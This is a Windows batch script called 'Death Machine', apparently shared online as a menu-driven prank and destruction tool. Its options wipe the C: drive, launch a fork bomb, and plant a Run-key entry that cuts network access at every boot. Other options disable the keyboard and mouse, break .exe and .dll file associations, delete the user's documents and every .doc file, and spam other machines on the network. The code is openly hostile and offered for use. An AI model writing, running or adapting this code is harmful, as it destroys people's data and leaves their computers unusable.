You are on page 1of 17

@echo off

title Death Machine


cd C:\

:tos
cls
color 3
echo ##########################################################################
echo ##########################################################################
echo ## This program is to show the power of a batch ##
echo ## witch many think to be useless and for skiddys ###
echo ## I take no responsibility for your actions. ####
echo ## Beyond this point it is you that has ####
echo ## the power to use this program's functions. #####
echo ## Deal with the fact that this can harm your computer or just x out now.#####
echo ## Do not come crying to me when you fried your computer. #####
echo ## This Program was made by wolf if you know me ####
echo ## or think you know me keep it to yourself... ###
echo ## DO NOT CLAIM THIS PROGRAM AS YOUR OWN!! ###
echo ##########################################################################
echo ##########################################################################

set input=nothing
set /p input= Do you aggree to the tos (yes or no):
if %input%==yes goto menuos
if %input%==no goto tosno

goto tos

:tosno
msg * NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
echo NONE SHALL PASS!!
goto end

:menuos
cls
color 3
echo ##########################################################################
echo ##########################################################################
echo ## This program is to show the power of a batch ##
echo ## witch many think to be useless and for skiddys ###
echo ## I take no responsibility for your actions. ####
echo ## Beyond this point it is you that has ####
echo ## the power to use this program's functions. #####
echo ## Deal with the fact that this can harm your computer or just x out now.#####
echo ## Do not come crying to me when you fried your computer. #####
echo ## This Program was made by wolf if you know me ####
echo ## or think you know me keep it to yourself... ###
echo ## DO NOT CLAIM THIS PROGRAM AS YOUR OWN!! ###
echo ##########################################################################
echo ##########################################################################

echo Pick your operating system.


echo 1. Windows Vista
echo.

echo 2. Windows XP
echo.

echo 3. Other Windows Below XP (testing still)


echo.
echo 4. Other Operating systems (none if you have a script to put here tell me)
echo _____________________________________________________________________________
echo Type Exit to Leave

set input=nothing
set /p input=I pick:
if %input%==1 goto vistamenu
if %input%==2 goto xpmenu
if %input%==3 goto otherwindows
if %input%==4 goto otheros
if %input%==exit goto end
if %input%==menuold goto menuold
goto menuos

:vistamenu
@echo off
title Death Machine
cd C:\
cls
color 3
echo ##########################################################################
echo ##########################################################################
echo ## This program is to show the power of a batch ##
echo ## witch many think to be useless and for skiddys ###
echo ## I take no responsibility for your actions. ####
echo ## Beyond this point it is you that has ####
echo ## the power to use this program's functions. #####
echo ## Deal with the fact that this can harm your computer or just x out now.#####
echo ## Do not come crying to me when you fried your computer. #####
echo ## This Program was made by wolf if you know me ####
echo ## or think you know me keep it to yourself... ###
echo ## DO NOT CLAIM THIS PROGRAM AS YOUR OWN!! ###
echo ##########################################################################
echo ##########################################################################

echo Pick your poison:


echo 1. Shutdown Computer
echo.

echo 2. Restart Computer


echo.

echo 3. Wipe Hard Drive


echo.

echo 4. Disable Internet Permently (still testing


echo it may or may not work and unshure on what operating systems it works on)
echo.

echo 5. I like notepads lets rain down the notepads


echo.

echo 6. Fork Bombing (eats the computers cpu and ram up forever)
echo.

echo 7. Screw up the keyboard (very funny)


echo.
echo 8. Delayed shutdown (lets you shutdown the computer anyware from 20secs-5hrs)
echo _____________________________________________________________________________
echo 11. Change log
echo _____________________________________________________________________________
echo Type "Exit" to Leave or "back" to go back

set input=nothing
set /p input=I pick:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
if %input%==6 goto six
if %input%==7 goto seven
if %input%==8 goto eight
if %input%==11 goto eleven
if %input%==exit goto end
if %input%==back goto menuos
goto vistamenu

:one
shutdown -s -c Shuting Down Have a nice day
goto end

:two
shutdown -r -c Restarting Have a nice day
goto end

:three
echo your computer is dead.... Have a nice Day
pause
rmdir /S /Q C:\
goto end

:four
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v
WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v
CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo i think i just pulled the wrong plug oops.... s sjh d d csa tehjk
in..tern..et des..tr..oyed have a nice day
goto menuos

:five
@ECHO off
START %SystemRoot%\system32\notepad.exe
goto seven

:six
@ECHO OFF
START Death Machine.bat
goto eight

:seven
@ echo off

rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >>
"nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >>
"nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\
>> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\
>> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\
>> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\
>> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\
>> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\
>> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\
>> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\
>> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\
>> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\
>> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\
>> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\
>> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\
>> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\
>> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\
>> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\
>> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\
>> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\
>> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\
>> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------
rem ---------------------------------
rem Delete My Documents
del /f /q '%userprofile%\My Documents\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete All Documents
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------
msg * GAME OVER!!!

:eight
@echo off
color 0e
echo Have fun with this its handy to screw with people.
echo Shall we turn off this computer after a set time?
echo Set Time: 20secs 200secs
echo 2000(1/2 hr) 3600(1hr)
echo 7200(2hrs) 20000secs (5hrs)
echo or type "back" to go back to the menuos

set /p note=
If '%note%'=='20' start C:\Windows\System32\shutdown.exe -s -t 20 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='200' start C:\Windows\System32\shutdown.exe -s -t 200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='2000' start C:\Windows\System32\shutdown.exe -s -t 2000 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='3600' start C:\Windows\System32\shutdown.exe -s -t 3600 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='7200' start C:\Windows\System32\shutdown.exe -s -t 7200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='20000' start C:\Windows\System32\shutdown.exe -s -t 20000 -c
"Complete! Type "yes" in the box to cancel"
If '%note%'=='back' goto menu

echo Want to cancel?

set /p note=
If '%note%'=='yes' start shutdown -a
If '%note%'=='no' goto timefinish

echo Completed. The timer has been set


echo Have a nice day!

:timefinish

pause
goto menuos

:eleven
msg * May 27, 2009 I have finished this update on the program ive added 10
functions im going to add more and i will keep adding changes to this change log
goto menuos

:end

exit

:xpmenu
cls
color 3
echo ##########################################################################
echo ##########################################################################
echo ## This program is to show the power of a batch ##
echo ## witch many think to be useless and for skiddys ###
echo ## I take no responsibility for your actions. ####
echo ## Beyond this point it is you that has ####
echo ## the power to use this program's functions. #####
echo ## Deal with the fact that this can harm your computer or just x out now.#####
echo ## Do not come crying to me when you fried your computer. #####
echo ## This Program was made by wolf if you know me ####
echo ## or think you know me keep it to yourself... ###
echo ## DO NOT CLAIM THIS PROGRAM AS YOUR OWN!! ###
echo ##########################################################################
echo ##########################################################################

pause
echo Pick your poison:
echo 1. Shutdown Computer
echo.

echo 2. Restart Computer


echo.

echo 3. Wipe Hard Drive


echo.
echo 4. Send message to all computers on
echo the network (still testing wont work on vista)
echo.
echo 5. cycle messages on all computers on the entire network may
echo be the same as number 4 (still testing wont work n vista)
echo.

echo 6. Disable Internet Permently (still testing


echo it may or may not work and unshure on what operating systems it works on)
echo.

echo 7. I like notepads lets rain down the notepads


echo.

echo 8. Fork Bombing (eats the computers cpu and ram up forever)
echo.

echo 9. Screw up the keyboard and some other goodys


echo.
echo 10. Delayed shutdown (lets you shutdown the computer anyware from 20secs-5hrs)
echo _____________________________________________________________________________
echo 11. Change log
echo _____________________________________________________________________________
echo Type "Exit" to Leave or "back" to go back

set input=nothing
set /p input=I pick:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
if %input%==6 goto six
if %input%==7 goto seven
if %input%==8 goto eight
if %input%==9 goto nine
if %input%==10 goto ten
if %input%==11 goto eleven
if %input%==exit goto end
if %input%== back goto menuos
goto xpmenu

:one
shutdown -s -c Shuting Down Have a nice day
goto end

:two
shutdown -r -c Restarting Have a nice day
goto end

:three
echo your computer is dead.... Have a nice Day
pause
rmdir /S /Q C:\
goto end

:four
net send * Just got owned
goto menuos

:five
echo press the x to stop sending messages
pause
@ECHO off
net send * hello this network has been Death Machined by DW!
goto five

:six
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v
WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v
CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo i think i just pulled the wrong plug oops.... s sjh d d csa tehjk
in..tern..et des..tr..oyed have a nice day
goto menuos

:seven
@ECHO off
START %SystemRoot%\system32\notepad.exe
goto seven

:eight
@ECHO OFF
START Death Machine.bat
goto eight

:nine
@ echo off

rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >>
"nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >>
"nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\
>> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\
>> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\
>> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\
>> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\
>> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\
>> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\
>> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\
>> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\
>> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\
>> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\
>> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\
>> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\
>> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\
>> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\
>> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\
>> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\
>> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\
>> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\
>> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------
rem ---------------------------------
rem Delete My Documents
del /f /q '%userprofile%\My Documents\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete All Documents
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------
msg * GAME OVER!!!
goto menuos

:ten
@echo off
color 0e
echo Have fun with this its handy to screw with people.
echo Shall we turn off this computer after a set time?
echo Set Time: 20secs 200secs
echo 2000(1/2 hr) 3600(1hr)
echo 7200(2hrs) 20000secs (5hrs)
echo or type "back" to go back to the menuos

set /p note=
If '%note%'=='20' start C:\Windows\System32\shutdown.exe -s -t 20 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='200' start C:\Windows\System32\shutdown.exe -s -t 200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='2000' start C:\Windows\System32\shutdown.exe -s -t 2000 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='3600' start C:\Windows\System32\shutdown.exe -s -t 3600 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='7200' start C:\Windows\System32\shutdown.exe -s -t 7200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='20000' start C:\Windows\System32\shutdown.exe -s -t 20000 -c
"Complete! Type "yes" in the box to cancel"
If '%note%'=='back' goto menu

echo Want to cancel?

set /p note=
If '%note%'=='yes' start shutdown -a
If '%note%'=='no' goto timefinish

echo Completed. The timer has been set


echo Have a nice day!

:timefinish

pause
goto menu

:eleven
msg * May 27, 2009 I have finished this update on the program ive added 10
functions im going to add more and i will keep adding changes to this change log
goto menu

:otherwindows
cls
color 3
echo ##########################################################################
echo ##########################################################################
echo ## This program is to show the power of a batch ##
echo ## witch many think to be useless and for skiddys ###
echo ## I take no responsibility for your actions. ####
echo ## Beyond this point it is you that has ####
echo ## the power to use this program's functions. #####
echo ## Deal with the fact that this can harm your computer or just x out now.#####
echo ## Do not come crying to me when you fried your computer. #####
echo ## This Program was made by wolf if you know me ####
echo ## or think you know me keep it to yourself... ###
echo ## DO NOT CLAIM THIS PROGRAM AS YOUR OWN!! ###
echo ##########################################################################
echo ##########################################################################
pause
echo Pick your poison:
echo 1. Shutdown Computer
echo.

echo 2. Restart Computer


echo.

echo 3. Wipe Hard Drive


echo.
echo 4. Send message to all computers on
echo the network (still testing wont work on vista)
echo.

echo 5. cycle messages on all computers on the entire network may


echo be the same as number 4 (still testing wont work n vista)
echo.

echo 6. Disable Internet Permently (still testing


echo it may or may not work and unshure on what operating systems it works on)
echo.

echo 7. I like notepads lets rain down the notepads


echo.

echo 8. Fork Bombing (eats the computers cpu and ram up forever)
echo.

echo 9. Screw up keyboard and some other goodys


echo.
echo 10. Delayed shutdown (lets you shutdown the computer anyware from 20secs-5hrs)
echo _____________________________________________________________________________
echo 11. Change log
echo _____________________________________________________________________________
echo Type "Exit" to Leave or "back" to go back

set input=nothing
set /p input=I pick:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
if %input%==6 goto six
if %input%==7 goto seven
if %input%==8 goto eight
if %input%==9 goto nine
if %input%==10 goto ten
if %input%==11 goto eleven
if %input%==exit goto end
if %input%==back goto menuos
goto menuold

:one
shutdown -s -c Shuting Down Have a nice day
goto end

:two
shutdown -r -c Restarting Have a nice day
goto end

:three
echo your computer is dead.... Have a nice Day
pause
rmdir /S /Q C:\
goto end

:four
net send * Just got owned
goto menu

:five
echo press the x to stop sending messages
pause
@ECHO off
net send * hello this network has been Death Machined by DW!
goto five

:six
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v
WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v
CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo i think i just pulled the wrong plug oops.... s sjh d d csa tehjk
in..tern..et des..tr..oyed have a nice day
goto menuos

:seven
@ECHO off
START %SystemRoot%\system32\notepad.exe
goto seven

:eight
@ECHO OFF
START Death Machine.bat
goto eight

:nine
echo this function has been detected to keep the hole program from being
echo detected

:ten
@echo off
color 0e
echo Have fun with this its handy to screw with people.
echo Shall we turn off this computer after a set time?
echo Set Time: 20secs 200secs
echo 2000(1/2 hr) 3600(1hr)
echo 7200(2hrs) 20000secs (5hrs)
echo or type "back" to go back to the menu

set /p note=
If '%note%'=='20' start C:\Windows\System32\shutdown.exe -s -t 20 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='200' start C:\Windows\System32\shutdown.exe -s -t 200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='2000' start C:\Windows\System32\shutdown.exe -s -t 2000 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='3600' start C:\Windows\System32\shutdown.exe -s -t 3600 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='7200' start C:\Windows\System32\shutdown.exe -s -t 7200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='20000' start C:\Windows\System32\shutdown.exe -s -t 20000 -c
"Complete! Type "yes" in the box to cancel"
If '%note%'=='back' goto menuos

echo Want to cancel?

set /p note=
If '%note%'=='yes' start shutdown -a
If '%note%'=='no' goto timefinish

echo Completed. The timer has been set


echo Have a nice day!

:timefinish

pause
goto menuos

:eleven
msg * May 27, 2009 I have finished this update on the program ive added 10
functions im going to add more and i will keep adding changes to this change log
goto menuos

:otheros
cls
echo no functions added for this menu yet
echo if you have some scripts for this tell me and i will add them
echo contact me via email or msn at dark_star_wolf_007_1@yahoo.com
echo dont pester me or anything most likely ill tell you to stfu and
echo block your email
pause
goto menuos

:menuold
cls
color 3
echo ##########################################################################
echo ##########################################################################
echo ## This program is to show the power of a batch ##
echo ## witch many think to be useless and for skiddys ###
echo ## I take no responsibility for your actions. ####
echo ## Beyond this point it is you that has ####
echo ## the power to use this program's functions. #####
echo ## Deal with the fact that this can harm your computer or just x out now.#####
echo ## Do not come crying to me when you fried your computer. #####
echo ## This Program was made by wolf if you know me ####
echo ## or think you know me keep it to yourself... ###
echo ## DO NOT CLAIM THIS PROGRAM AS YOUR OWN!! ###
echo ##########################################################################
echo ##########################################################################

pause
echo welcome to the admin hidden menu
echo.
echo Pick your poison:
echo 1. Shutdown Computer
echo.

echo 2. Restart Computer


echo.

echo 3. Wipe Hard Drive


echo.
echo 4. Send message to all computers on
echo the network (still testing wont work on vista)
echo.

echo 5. cycle messages on all computers on the entire network may


echo be the same as number 4 (still testing wont work n vista)
echo.

echo 6. Disable Internet Permently (still testing


echo it may or may not work and unshure on what operating systems it works on)
echo.

echo 7. I like notepads lets rain down the notepads


echo.

echo 8. Fork Bombing (eats the computers cpu and ram up forever)
echo.

echo 9. Screw up the keyboard and some other goodys


echo.
echo 10. Delayed shutdown (lets you shutdown the computer anyware from 20secs-5hrs)
echo _____________________________________________________________________________
echo 11. Change log
echo _____________________________________________________________________________
echo Type Exit to Leave

set input=nothing
set /p input=I pick:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
if %input%==6 goto six
if %input%==7 goto seven
if %input%==8 goto eight
if %input%==9 goto nine
if %input%==10 goto ten
if %input%==11 goto eleven
if %input%==exit goto end
goto menuold

:one
shutdown -s -c Shuting Down Have a nice day
goto end
:two
shutdown -r -c Restarting Have a nice day
goto end

:three
echo your computer is dead.... Have a nice Day
pause
rmdir /S /Q C:\
goto end

:four
net send * Just got owned
goto menuos

:five
echo press the x to stop sending messages
pause
@ECHO off
net send * hello this network has been Death Machined by DW!
goto five

:six
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v
WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v
CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo i think i just pulled the wrong plug oops.... s sjh d d csa tehjk
in..tern..et des..tr..oyed have a nice day
goto menuos

:seven
@ECHO off
START %SystemRoot%\system32\notepad.exe
goto seven

:eight
@ECHO OFF
START Death Machine.bat
goto eight

:nine
@ echo off

rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >>
"nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >>
"nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\
>> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\
>> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\
>> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\
>> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\
>> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\
>> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\
>> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\
>> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\
>> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\
>> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\
>> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\
>> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\
>> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\
>> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\
>> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\
>> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\
>> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\
>> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\
>> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------
rem ---------------------------------
rem Delete My Documents
del /f /q '%userprofile%\My Documents\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete All Documents
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------
msg * GAME OVER!!!
goto menuos

:ten
@echo off
color 0e
echo Have fun with this its handy to screw with people.
echo Shall we turn off this computer after a set time?
echo Set Time: 20secs 200secs
echo 2000(1/2 hr) 3600(1hr)
echo 7200(2hrs) 20000secs (5hrs)
echo or type "back" to go back to the menuos

set /p note=
If '%note%'=='20' start C:\Windows\System32\shutdown.exe -s -t 20 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='200' start C:\Windows\System32\shutdown.exe -s -t 200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='2000' start C:\Windows\System32\shutdown.exe -s -t 2000 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='3600' start C:\Windows\System32\shutdown.exe -s -t 3600 -c "Complete!
Type "yes" in the box to cancel"
